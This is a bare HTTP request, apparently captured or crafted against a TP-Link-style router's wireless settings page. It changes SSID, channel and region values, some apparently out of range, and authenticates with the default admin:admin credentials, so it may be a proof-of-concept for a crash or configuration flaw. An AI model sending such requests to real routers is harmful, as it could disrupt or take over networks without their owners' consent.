GET /userRpm/WlanNetworkRpm.htm?ssid1=TP-LINK_000000&region=85&channel=15&mode=2&chanWidth=1&rate=41&ap=1&broadcast=2&brlssid=&brlbssid=&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save HTTP/1.1
Host: 0.0.0.0:49157
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://0.0.0.0:49157/userRpm/WlanNetworkRpm.htm
Cookie: session_uid=lrtuzfrml
Upgrade-Insecure-Requests: 1

